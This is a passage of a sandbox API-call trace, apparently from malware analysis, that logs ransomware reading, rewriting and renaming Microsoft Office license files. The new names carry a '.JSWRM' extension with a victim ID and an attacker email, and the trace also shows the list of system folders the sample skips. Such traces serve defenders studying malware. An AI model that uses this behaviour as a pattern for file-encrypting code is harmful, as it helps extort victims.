dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0112.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0112.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0112.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0112.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0112.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.024] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19939) returned 1 [0112.024] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0112.024] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0112.027] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.027] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0112.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.027] CloseHandle (hObject=0x45c) returned 1 [0112.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0112.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0112.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0112.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0112.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0112.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0112.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0112.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.029] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9ff550, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec9ff550, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecb0a5ea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_Retail-pl.xrm-ms", cAlternateFileName="VI30B0~1.XRM")) returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="recovery") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="system volume information") returned 1 [0112.029] lstrcmpiW (lpString1="VisioStdR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0112.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0112.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0112.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0112.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0112.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0112.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0112.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0112.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0112.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.030] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0112.030] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0112.030] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0112.033] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.033] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0112.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.033] CloseHandle (hObject=0x45c) returned 1 [0112.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0112.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0112.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0112.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0112.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0112.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0112.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.033] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0112.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0112.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0112.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0112.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.034] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9b309b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec9b309b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeca71ca7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_Retail-ppd.xrm-ms", cAlternateFileName="VI753F~1.XRM")) returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.034] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.035] lstrcmpiW (lpString1="VisioStdR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0112.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240ef8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0112.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0112.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0112.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0112.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0112.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0112.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0112.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.036] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20780) returned 1 [0112.036] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0112.036] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0112.038] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.039] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0112.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.039] CloseHandle (hObject=0x45c) returned 1 [0112.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0112.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0112.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0112.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0112.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0112.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0112.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0112.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0112.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0112.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0112.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.040] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec98ce75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec98ce75, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeca4ba0a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_Retail-ul-oob.xrm-ms", cAlternateFileName="VI2215~1.XRM")) returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.040] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.041] lstrcmpiW (lpString1="VisioStdR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.041] RtlAllocateHeap (HeapHandle=0x1e0000, 